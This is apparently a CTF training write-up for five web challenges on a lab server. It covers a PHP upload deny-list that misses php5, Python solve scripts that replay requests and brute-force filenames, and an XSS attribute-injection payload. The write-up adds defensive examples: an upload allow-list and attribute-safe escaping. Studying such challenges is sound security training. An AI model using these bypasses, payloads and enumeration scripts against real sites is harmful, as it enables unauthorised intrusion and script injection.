Hehe, the super cool boss's easy-challenge training~
test1
Capture the request, craft the fields, then replay it.
test2
The challenge checks both the uploaded file's type and its extension, but it does not filter php5.
Looking at the source:
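The flaw behind test2 is a deny-list that forgets one of the alternate extensions the PHP module also handles. As an added illustration that is not the challenge's own code, the snippet below puts a constructed deny-list check (blocks php but not php5) beside an allow-list check that only accepts the image extensions an upload feature actually needs; the extension sets are assumptions.

```python
import os

# Constructed deny-list mirroring the challenge's gap: "php5" is missing.
INCOMPLETE_DENY = {"php", "phtml"}

# Assumed allow-list: the only extensions this upload feature needs to accept.
ALLOW = {"jpg", "jpeg", "png", "gif"}


def ext_of(filename: str) -> str:
    """Return the final extension, lowercased and without the dot."""
    return os.path.splitext(filename)[1].lstrip(".").lower()


def denylist_check(filename: str) -> bool:
    """Flawed check: rejects only the listed extensions, so 'x.php5' passes."""
    return ext_of(filename) not in INCOMPLETE_DENY


def allowlist_check(filename: str) -> bool:
    """Stricter check: accept only known extensions and exactly one dot,
    so 'shell.php.jpg'-style double extensions are rejected as well."""
    base = os.path.basename(filename)
    if base.count(".") != 1:
        return False
    return ext_of(base) in ALLOW


if __name__ == "__main__":
    for name in ["pic.jpg", "shell.php", "shell.php5", "shell.PHP5", "shell.php.jpg"]:
        print(f"{name:15} deny-list: {denylist_check(name)!s:5} allow-list: {allowlist_check(name)}")
```

The allow-list version is the one to keep: it does not need updating each time another executable extension turns up, and case-folding plus the single-dot rule closes the obvious variants.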
test3
First of all, don't be scared, emmmmm. When you run into PHP code auditing, never back down (especially with simple PHP!!!). Here is the solve script~
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import requests
from urllib.parse import unquote

url = "http://192.168.70.245/test3/"
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0'}
param = 'ea'
sess = requests.Session()  # one session so cookies persist across the 12 rounds
for i in range(12):
    # value[] is posted as an array parameter
    data = {'value[]': unquote(param)}
    res = sess.post(url, headers=headers, data=data).text
    # the first two characters of the reply become the next value to send
    param = res[0:2]
    flag = re.findall('flag.+?}', res)
    print(flag)
test4
The first thing here is to understand the regular expression.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests


def a():
    # first segment: 1[3458]9
    for i in ['3', '4', '5', '8']:
        yield '1' + i + '9'


def b():
    # any single digit
    for j in range(10):
        yield str(j)


def c():
    # last four positions: one of 0, 5, 6
    for k in ['0', '5', '6']:
        yield k


if __name__ == '__main__':
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0'}
    url = "http://192.168.70.245/test4/"
    # enumerate every filename the regex allows and stop at the first one that exists
    for i1 in a():
        for i2 in b():
            for i3 in b():
                for i4 in b():
                    for i5 in b():
                        for i6 in c():
                            for i7 in c():
                                for i8 in c():
                                    for i9 in c():
                                        url_ = url + i1 + i2 + i3 + i4 + i5 + i6 + i7 + i8 + i9 + '.php'
                                        response = requests.get(url_, headers=headers)
                                        if response.status_code == 200:
                                            print(url_)
                                            print(response.content)
                                            exit(0)
Or write a script that builds the dictionary, then run it through 御剑 (Yujian) multi-threaded to get the result.
test5
This one only tests some common XSS payloads and bypasses: read the source to find the bypass, and once the alert box pops you have the flag.
payload:'oninput=alert`1`//
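The payload above works because the value lands inside a single-quoted attribute, so a filter that only looks for tags or the word script never sees anything to strip. As an added example that is not the challenge's source, the constructed `naive_filter` below stands in for that kind of blacklist; `render_escaped` shows the fix, which is context-aware output encoding (`html.escape` with `quote=True`, so quotes can no longer close the attribute). The parser-based check lists which attributes the browser would actually see on the tag.

```python
import html
import re
from html.parser import HTMLParser

# Payload from the write-up; closes the quoted value and starts a new attribute.
PAYLOAD = "'oninput=alert`1`//"


def naive_filter(value: str) -> str:
    """Constructed blacklist of the kind the challenge defeats: drops angle
    brackets and the word 'script', and nothing else."""
    value = value.replace("<", "").replace(">", "")
    return re.sub(r"script", "", value, flags=re.IGNORECASE)


def render_naive(value: str) -> str:
    """Reflect the filtered value into a single-quoted attribute (vulnerable)."""
    return "<input value='" + naive_filter(value) + "'>"


def render_escaped(value: str) -> str:
    """Reflect the value with attribute-safe encoding (fixed).
    quote=True also encodes ' and \", so the attribute cannot be closed early."""
    return "<input value='" + html.escape(value, quote=True) + "'>"


class _InputAttrs(HTMLParser):
    """Collect the attribute names the parser assigns to the <input> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.names: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.names.extend(name.lower() for name, _ in attrs)


def attribute_names(markup: str) -> list[str]:
    """Return the attribute names found on the <input> tag in markup."""
    p = _InputAttrs()
    p.feed(markup)
    p.close()
    return p.names


if __name__ == "__main__":
    for label, markup in [("naive", render_naive(PAYLOAD)), ("escaped", render_escaped(PAYLOAD))]:
        print(f"{label:8} {markup}")
        print(f"{'':8} attributes: {attribute_names(markup)}")
```

Run it and the naive rendering grows an extra `oninput` attribute while the escaped rendering keeps a single `value` attribute whose content is just text. Encoding has to match the output context; a tag-oriented blacklist says nothing about attribute or JavaScript contexts.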